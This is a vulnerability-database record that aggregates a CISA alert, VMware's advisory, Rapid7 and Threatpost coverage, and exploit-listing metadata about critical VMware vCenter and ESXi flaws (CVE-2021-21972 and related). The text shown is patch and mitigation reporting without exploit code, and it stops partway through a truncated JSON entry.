ID CISA:CB32DB4C2EA92462F387E1DA6C08F57E Type cisa Reporter CISA Modified 2021-02-24T00:00:00
Description
VMware has released security updates to address multiple vulnerabilities—CVE-2021-21972, CVE-2021-21973, CVE-2021-21974—in ESXi, vCenter Server, and Cloud Foundation. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
CISA encourages users and administrators to review VMware Security Advisory VMSA-2021-0002 and apply the necessary updates.
This product is provided subject to this Notification and this Privacy & Use policy.
Please share your thoughts.
We recently updated our anonymous product survey; we'd welcome your feedback.
{"rapid7blog": [{"lastseen": "2021-03-05T15:09:20", "description": "\n\n_This blog post was co-authored by Bob Rudis and Caitlin Condon. _\n\n## What\u2019s up?\n\nOn Feb. 23, 2021, VMware published an [advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) (VMSA-2021-0002) describing three weaknesses affecting VMware ESXi, VMware vCenter Server, and VMware Cloud Foundation.\n\nBefore digging into the individual vulnerabilities, it is vital that all organizations that use the HTML5 VMware vSphere Client, i.e., VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2) _immediately_ restrict network access to those clients\u2014especially if they are not segmented off on a management network\u2014implement the mitigation noted below, and consider performing accelerated/immediate patching on those systems.\n\n## Vulnerability details and recommendations\n\n**CVE-2021-21972 **is a critical (CVSSv3 base 9.8) unauthenticated remote code execution vulnerability in the HTML5 vSphere client. Any malicious actor with access to port 443 can exploit this weakness and execute commands with unrestricted privileges. \n\nPT Swarm has [provided a detailed walkthrough](<https://swarm.ptsecurity.com/unauth-rce-vmware/>) of this weakness and how to exploit it.\n\nRapid7 researchers have independently analyzed, tested, and confirmed the exploitability of this weakness and have provided [a full technical analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=blog#rapid7-analysis>).\n\nProof-of-concept working exploits are beginning to appear on public code-sharing sites.\n\nOrganizations should restrict access to this plugin and patch affected systems immediately (i.e., not wait for standard patch change windows).\n\nVMware has [provided steps for a temporary mitigation](<https://kb.vmware.com/s/article/82374>), which involves disabling the plugin.\n\n**CVE-2021-21973 **is an important (CVSSv3 base 8.8) heap-overflow-based remote code execution vulnerability in VMware ESXi OpenSLP. Attackers with same-segment network access to port 427 on affected systems may be able to use the heap-overflow weakness to perform remote code execution.\n\nVMware has [provided steps for a temporary mitigation](<https://kb.vmware.com/s/article/76372>), which involves disabling the SLP service on affected systems.\n\nRapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.\n\n**CVE-2021-21974** is a moderate (CVSSv3 base 5.3) server-side request forgery vulnerability affecting the HTML5 vSphere Client. Attackers with access to port 443 of affected systems can use this weakness to gain access to underlying system information.\n\nVMware has [provided steps for a temporary mitigation](<https://kb.vmware.com/s/article/82374>), which involves disabling the plugin.\n\nSince attackers will already be focusing on VMware systems due to the other high-severity weaknesses, Rapid7 recommends applying the vendor-provided patches as soon as possible after performing the vendor-recommended mitigation.\n\n## Attacker activity\n\nRapid7 Labs has not detected broad scanning for internet-facing VMware vCenter servers, but Bad Packets [has reported](<https://twitter.com/bad_packets/status/1364661586070102016?s=20>) that they\u2019ve detected opportunistic scanning. We will continue to monitor Project Heisenberg for attacker activity and update this blog post as we have more information.\n\n## Updates\n\n**2021-03-02** \u2022 As per our [updated analysis](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972#rapid7-analysis>), members of the cybersecurity community (h/t to [@0x80O0oOverfl0w](<https://twitter.com/0x80O0oOverfl0w>)) have confirmed active, [opportunistic exploitation is occurring](<https://twitter.com/0x80O0oOverfl0w/status/1366754245870030849>). Rapid7 Labs has also identified active probing for internet-facing VMware vCenter instances. If your organization has not prioritized patching for this vulnerability Rapid7 strongly urges you to do so as soon as possible. \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-02-24T22:22:14", "type": "rapid7blog", "title": "VMware vCenter Server CVE-2021-21972 Remote Code Execution Vulnerability: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T22:22:14", "id": "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "href": "https://blog.rapid7.com/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-05T16:53:27", "description": "\n\nOn Tuesday, May 25, 2021, VMware published [security advisory VMSA-2021-0010](<https://www.vmware.com/security/advisories/VMSA-2021-0010.html>), which includes details on CVE-2021-21985, a critical remote code execution vulnerability in the vSphere Client (HTML5) component of vCenter Server (6.5, 6.7, and 7.0) and VMware Cloud Foundation (3.x and 4.x). The vulnerability arises from lack of input validation in the Virtual SAN Health Check plug-in, which is enabled by default in vCenter Server. Successful exploitation requires network access to port 443 and allows attackers to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. CVE-2021-21985 carries a CVSSv3 base score of 9.8.\n\nWhile there are no reports of exploitation in the wild as of May 26, 2021, defenders may remember that CVE-2021-21972, another critical vCenter Server vulnerability from earlier this year, saw widespread exploitation within a few days of disclosure. It is likely that this latest severe flaw will follow suit, and we strongly recommend patching on an emergency basis, particularly given the increased prevalence of ransomware (whose operators often already have access to corporate networks via phished, leaked, reused, or otherwise stolen credentials). **Edit June 5, 2021:** Exploitation is now occurring in the wild. See AttackerKB for [full technical analysis](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>).\n\nRapid7 Labs identified roughly 6,000 instances of vCenter Server exposed to the public internet as of May 26, 2021:\n\n\n\n## Recommendations\n\nVMware has a number of resources available for vCenter Server customers looking to understand and address CVE-2021-21985 and other vulnerabilities in this week\u2019s advisory, including a [blog post](<https://blogs.vmware.com/vsphere/2021/05/vmsa-2021-0010.html>) and a [supplemental FAQ](<https://core.vmware.com/resource/vmsa-2021-0010-faq>).\n\nOrganizations should update to an unaffected version of vCenter Server immediately, without waiting for their regular patch cycles. Those with emergency patch or incident response procedures should consider invoking them, particularly if their implementations of vCenter Server are (or were recently) exposed to the public internet. If you are unable to patch immediately, VMware has instructions on disabling the Virtual SAN Health Check plugin [here](<https://kb.vmware.com/s/article/83829>). Note that while disabling the plugin may mitigate exploitability, it does not remove the vulnerability.\n\nNetwork administrators should ensure that vCenter Server is not exposed to the internet.\n\nFor [further technical information of CVE-2021-21985](<https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=blog#rapid7-analysis>), as well as community assessments of exploitability and attacker value, see AttackerKB. We'll update this blog post with more information as it becomes available.\n\n**Update June 5, 2021:** Multiple community sources have confirmed CVE-2021-21985 is [being exploited in the wild](<https://twitter.com/GossiTheDog/status/1400868390726733831>).", "cvss3": {}, "published": "2021-05-26T18:57:20", "type": "rapid7blog", "title": "CVE-2021-21985: What you need to know about the latest critical vCenter Server vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985"], "modified": "2021-05-26T18:57:20", "id": "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "href": "https://blog.rapid7.com/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-12T22:49:57", "description": "## Archive directory traversals, now with your daily allowance of JSP\n\n\n\nIn a year already full of hot vulnerabilities, [CVE-2021-21972](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=blog>) in VMware's vCenter Server may already seem like old news. It's not, though! Thanks to [wvu-r7](<https://github.com/wvu-r7>) for grabbing this unauthenticated file upload combined with archive directory traversal to upload some sweet web shells. Also, thanks to [smcintyre-r7](<https://github.com/smcintyre-r7>) for reviewing and testing.\n\n## Keeping track of your favorite modules\n\nIf Metasploit's more than 3,500 modules ever feel like too much to track, [kalba-security](<https://github.com/kalba-security>) has added the `favorites` command to `msfconsole`. This new command allows users to save their favorite modules in a list viewable with `show favorites`. Thanks to [space-r7](<https://github.com/space-r7>) for helping get this over the line!\n\n## Google Summer of Code 2021\n\nWe are happy to announce that Metasploit Framework has been accepted for the 2021 iteration of Google Summer of Code! This year we are primarily looking for projects that increase visibility into the data that Metasploit collects or that make using exploitation APIs smoother. For more details on project ideas and how to apply, check out our [GSoC wiki page](<https://github.com/rapid7/metasploit-framework/wiki/How-to-Apply-to-GSoC>).\n\n## New Modules (3)\n\n * [VMware vCenter Server Unauthenticated OVA File Upload RCE](<https://github.com/rapid7/metasploit-framework/pull/14809>) by wvu, Mikhail Klyuchnikov, Viss, and mr_me, which exploits [CVE-2021-21972](<https://attackerkb.com/topics/lrfxAJ9nhV/vmware-vsphere-client-unauth-remote-code-execution-vulnerability-cve-2021-21972?referrer=blog>), an unauthenticated RCE in VMware Center.\n * [HPE Systems Insight Manager AMF Deserialization RCE](<https://github.com/rapid7/metasploit-framework/pull/14846>) by Grant Willcox, Harrison Neal, and Jang, which exploits ZDI-20-1449 ([CVE-2020-7200](<https://attackerkb.com/topics/31395hPcdh/cve-2020-7200?referrer=blog>)), targeting the `7.6.x` versions of HPE Systems Insight Manager software. Unauthenticated code execution as the user running the HPE SIM software (typically local administrator) can be obtained by sending a serialized AMF request to the `/simsearch/messagebroker/amfsecure` page.\n * [Microsoft Windows RRAS Service MIBEntryGet Overflow](<https://github.com/rapid7/metasploit-framework/pull/14847>) by Equation Group, Shadow Brokers, V\u00edctor Portal, and bcoles, which exploits CVE-2017-8461, a remote RCE in Routing and Remote Access Service (RRAS) on Windows Server 2003 identified as [CVE-2017-8461](<https://attackerkb.com/topics/cH3SJNSMsg/cve-2017-8461?referrer=blog>). This allows executing arbitrary commands with SYSTEM user privileges.\n\n## Enhancements and features\n\n * [#14201](<https://github.com/rapid7/metasploit-framework/pull/14201>) from [kalba-security](<https://github.com/kalba-security>) implements a new `msfconsole` command, `favorite`, which allows users to save favorite / commonly-used modules to a list for easy retrieval later.\n * [#14732](<https://github.com/rapid7/metasploit-framework/pull/14732>) from [zeroSteiner](<https://github.com/zeroSteiner>) adds a new Java deserialization mixin and modifies existing Java deserialization exploit modules to use the new mixin. Additionally, this fixes both the generation of the `ysoserial` payloads and the payloads themselves with improvements to the generation script, `find_ysoserial_offsets.rb` and pinning the `ysoserial` version that's used in the generation process.\n\n## Bugs Fixed\n\n * [#14792](<https://github.com/rapid7/metasploit-framework/pull/14792>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) updates 11 modules targeting Windows systems that were improperly checking the environment architecture which led to broken WOW64 detection in some cases.\n * [#14871](<https://github.com/rapid7/metasploit-framework/pull/14871>) from [dwelch-r7](<https://github.com/dwelch-r7>) ensures that the BinData library is always available for use within modules\n * [#14874](<https://github.com/rapid7/metasploit-framework/pull/14874>) from [dwelch-r7](<https://github.com/dwelch-r7>) fixes autoloading when utilizing `Msf::RPC::Client` in external tooling.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.33...6.0.34](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-03-04T11%3A16%3A38-06%3A00..2021-03-11T15%3A08%3A27-06%3A00%22>)\n * [Full diff 6.0.33...6.0.34](<https://github.com/rapid7/metasploit-framework/compare/6.0.33...6.0.34>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-03-12T21:45:48", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-8461", "CVE-2020-7200", "CVE-2021-21972"], "modified": "2021-03-12T21:45:48", "id": "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5", "href": "https://blog.rapid7.com/2021/03/12/metasploit-wrap-up-102/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-04T19:05:10", "description": "\n\n_See the Updates section at the end of this post for new information as it comes to light, including reports of exploitation._\n\n## Description\n\nOn Tuesday, September 21, 2021, VMware published [security advisory VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>), which includes details on CVE-2021-22005, a critical file upload vulnerability (CVSSv3 9.8) in vCenter Server that allows remote code execution (RCE) on the appliance. Successful exploitation of this vulnerability is achieved simply by uploading a specially crafted file via port 443 \u201cregardless of the configuration settings of vCenter Server.\u201d\n\nVMware has published an [FAQ](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq#section1>) outlining the details of this vulnerability and makes it clear that this should be patched \u201cimmediately.\u201d A workaround is also being provided by VMware \u2014 however, its use is not being recommended and should only be used as a temporary solution.\n\nYou can find Rapid7's vulnerability analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>) which contains a root cause analysis and full RCE information.\n\n## Affected products\n\n * vCenter Server versions 6.7 and 7.0\n * Cloud Foundation (vCenter Server) 3.x, 4.x\n\n## Guidance\n\nWe echo VMware\u2019s advice that impacted servers should be patched right away. While there are currently no reports of exploitation, we expect this to quickly change within days \u2014 just as previous critical vCenter vulnerabilities did ([CVE-2021-21985](<https://www.rapid7.com/blog/post/2021/05/26/cve-2021-21985-vcenter-server-what-you-need-to-know/>), [CVE-2021-21972](<https://www.rapid7.com/blog/post/2021/02/24/vmware-vcenter-server-cve-2021-21972-remote-code-execution-vulnerability-what-you-need-to-know/>)). Additionally, Rapid7 recommends that, as a general practice, network access to critical organizational infrastructure only be allowed via VPN and never open to the public internet.\n\nWe will update this post as more information becomes available, such as information on exploitation.\n\n## Rapid7 customers\n\nA vulnerability check for CVE-2021-22005 is under development and will be available to InsightVM and Nexpose customers in an upcoming content release pending the QA process.\n\nIn the meantime, InsightVM customers can use [Query Builder](<https://docs.rapid7.com/insightvm/query-builder/>) to find assets that have vCenter Server installed by creating the following query: `software.description` `contains` `vCenter Server`. Rapid7 Nexpose customers can create a [Dynamic Asset Group](<https://docs.rapid7.com/nexpose/performing-filtered-asset-searches>) based on a filtered asset search for `Software name` `contains` `vCenter Server`.\n\n## Updates\n\n**[September 22, 2021]** \nAn InsightVM and Nexpose vulnerability check for CVE-2021-22005 is scheduled to be released on the afternoon (EST) of September 22, 2021.\n\nRapid7 Labs estimates there are over 2,700 vulnerable vCenter servers exposed to the public internet. This represents only a fraction of vulnerable servers, however, as attackers with existing network ingress will be tempted to utilize that access to take advantage of this vulnerability. \n\n**[September 23, 2021]** \nCVE-2021-22005 authenticated checks for InsightVM and Nexpose are available in content update 3594982882, released on September 23, 2021.\n\n**[September 24, 2021]** \nCVE-2021-22005 is now being [exploited](<https://twitter.com/bad_packets/status/1441465508348317702>) in the wild.\n\n**[September 29, 2021]** \nUpdated description to include a link to the Rapid7 analysis on [AttackerKB](<https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis?referrer=blog>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-21T19:55:35", "type": "rapid7blog", "title": "Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005"], "modified": "2021-09-21T19:55:35", "id": "RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "href": "https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "vmware": [{"lastseen": "2022-05-26T00:56:14", "description": "3a. VMware vCenter Server updates address remote code execution vulnerability in the vSphere Client (CVE-2021-21972) \n\nThe vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. \n\n3b. ESXi OpenSLP heap-overflow vulnerability (CVE-2021-21974) \n\nOpenSLP as used in ESXi has a heap-overflow vulnerability. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8. \n\n3c. VMware vCenter Server updates address SSRF vulnerability in the vSphere Client (CVE-2021-21973) \n\nThe vSphere Client (HTML5) contains an SSRF (Server Side Request Forgery) vulnerability due to improper validation of URLs in a vCenter Server plugin. VMware has evaluated the severity of this issue to be in the Moderate severity range with a maximum CVSSv3 base score of 5.3.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-23T00:00:00", "type": "vmware", "title": "VMware ESXi and vCenter Server updates address multiple security vulnerabilities (CVE-2021-21972, CVE-2021-21973, CVE-2021-21974)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-23T00:00:00", "id": "VMSA-2021-0002", "href": "https://www.vmware.com/security/advisories/VMSA-2021-0002.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-02-25T02:52:39", "description": "[](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)\n\nClick to Register\n\nVMware has patched three vulnerabilities in its virtual-machine infrastructure for data centers, the most serious of which is a remote code execution (RCE) flaw in its vCenter Server management platform. The vulnerability could allow attackers to breach the external perimeter of an enterprise data center or leverage backdoors already installed on a system to find other vulnerable points of network entry to take over affected systems.\n\nPositive Technologies researcher Mikhail Klyuchnikov discovered two of the flaws in vCenter Server, the centralized management and automation platform for VMware\u2019s vSphere virtualization platform, which\u2014given VMware\u2019s dominant position in the market\u2014is used by the majority of enterprise data centers. Among its duties, vCenter Server manages virtual machines, multiple ESXi hypervisor hosts and other various dependent components from a central management dashboard.\n\n## **Where the VMware Flaws Were Found, What\u2019s Effected? **\n\nThe researcher found the most critical of the flaws, which is being tracked as [CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>) and has a CVSS v3 score of 9.8, in a vCenter Server plugin for vROPs in the vSphere Client functionality, according to [an advisory](<https://www.vmware.com/security/advisories/VMSA-2021-0002.html>) posted online Tuesday by VMware.\n\n\u201cA malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server,\u201d the company said.\n\nThe plugin is available in all default installations\u2014potentially giving attackers a wide attack surface\u2013and vROPs need not be present to have this endpoint available, according to VMware.\n\nThe main threat in terms of exploiting the vulnerability comes from insiders who have penetrated the protection of the network perimeter using other methods\u2013such as social engineering or web vulnerabilities\u2013or have access to the internal network using previously installed backdoors, according to Positive Technologies.\n\nKlyuchnikov said the VMware flaw poses \u201cno less threat\u201d than a notoriously easy-to-exploit[ Citrix RCE vulnerability](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>), [CVE-2019-19781](<https://www.google.ru/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwiOm6_Z4rnuAhWwlosKHTPHARo4ChAWMAJ6BAgLEAI&url=https://www.forbes.com/sites/daveywinder/2020/01/25/critical-security-warning-as-shitrix-hackers-ramp-up-critical-citrix-vulnerability-cve201919781-attacks/&usg=AOvVaw2MEaqcCGRpYlOcxC-Bey_j>), which was discovered two years ago affecting more than 25,000 servers globally. It is especially dangerous because \u201cit can be used by any unauthorized user,\u201d he said.\n\n\u201cThe error allows an unauthorized user to send a specially crafted request, which will later give them the opportunity to execute arbitrary commands on the server,\u201d Klyuchnikov explained. \u201cAfter receiving such an opportunity, the attacker can develop this attack, successfully move through the corporate network, and gain access to the data stored in the attacked system, such as information about virtual machines and system users.\u201d\n\n## How is CVE-2021-21972 Exploited?\n\nIn the case in which vulnerable software can be accessed from the internet, an external attacker can break into a company\u2019s external perimeter and also gain access to sensitive data, he added. This scenario is highly likely based on previous pentests executed by Positive Technologies, which allowed researchers to breach the network perimeter and gain access to local network resources in 93 percent of companies, according to the company.\n\nAnother flaw patched by VMware in the update also has potential for remote code execution and affects the hypervisor [VMware ESXi](<https://threatpost.com/vmware-critical-flaw-esxi-hypervisor/161457/>) , the company said. [CVE-2021-21974](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21974>), with a CVSSv3 base score of 8.9. is a heap-overflow vulnerability in the OpenSLP component as used in an ESXi host.\n\nA threat actor who\u2019s already inside the same network segment as an ESXi host and has access to port 427 can use the vulnerability to trigger the heap-overflow issue in the OpenSLP service, resulting in remote code execution, according to VMware.\n\nThe other flaw Klyuchnikov discovered\u2014tracked as [CVE-2021-21973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21973>) and the least serious of the three\u2013is a Server Side Request Forgery (SSRF) vulnerability due to improper validation of URLs in a vCenter Server plugin with a CVSS score of 5.3, according to VMWare. A malicious actor with network access to port 443 may exploit this issue by sending a POST request to vCenter Server plugin leading to information disclosure,\u201d the company said.\n\nUnauthorized users can use the flaw to send requests as the targeted server to help threat actors develop further attacks. Used in combination with the other vulnerabilities, attackers could leverage it to scan the company\u2019s internal network and obtain information about the open ports of various services, Klyuchnikov said.\n\n## What VMware is Recommending for a Fix to the Data Center Bugs?\n\nVMware advised customers to install all updates provided to affected deployments to remediate the threat the vulnerabilities pose. The company also provided workarounds for those who can\u2019t immediately update their systems.\n\nPositive Technologies also recommended that companies affected who have vCenter Server interfaces on the perimeter of their organizations remove them, and also allocate the interfaces to a separate VLAN with a limited access list in the internal network, the company said.\n\n**_Is your small- to medium-sized business an easy mark for attackers?_**\n\n**Threatpost WEBINAR:** _ Save your spot for \u201c_**15 Cybersecurity Gaffes SMBs Make**_,\u201d a _[**_FREE Threatpost webinar_**](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)** _on Feb. 24 at 2 p.m. ET._**_ Cybercriminals count on you making these mistakes, but our experts will help you lock down your small- to mid-sized business like it was a Fortune 100. _[_Register NOW_](<https://threatpost.com/webinars/15-cybersecurity-gaffes-and-fixes-mid-size-businesses-face/?utm_source=ART&utm_medium=ART&utm_campaign=Feb_webinar>)_ for this **LIVE **webinar on Wed., Feb. 24._\n", "cvss3": {}, "published": "2021-02-24T17:14:55", "type": "threatpost", "title": "VMWare Patches Critical RCE Flaw in vCenter Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-19781", "CVE-2021-21972", "CVE-2021-21973", "CVE-2021-21974"], "modified": "2021-02-24T17:14:55", "id": "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "href": "https://threatpost.com/vmware-patches-critical-rce-flaw-in-vcenter-server/164240/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-02-16T19:35:05", "description": "A remote code execution vulnerability exists in VMware vSpehre Client. The vulnerability is due to improper validation of paths in an uploaded tarball. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-28T00:00:00", "type": "checkpoint_advisories", "title": "VMware vSphere Client Remote Code Execution (CVE-2021-21972; CVE-2021-21973)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2021-03-20T00:00:00", "id": "CPAI-2021-0106", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-03-28T11:58:37", "description": "# CVE-2021-21972\n<b>[CVE-2021-21972] VMware vSphere Client Unaut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-03T23:03:11", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972", "CVE-2021-21973"], "modified": "2022-02-12T11:51:32", "id": "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:35:06", "description": "# CVE-2021-21972\n<b>[CVE-2021-21972] VMware vSphere Client Unaut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-03T23:03:11", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": 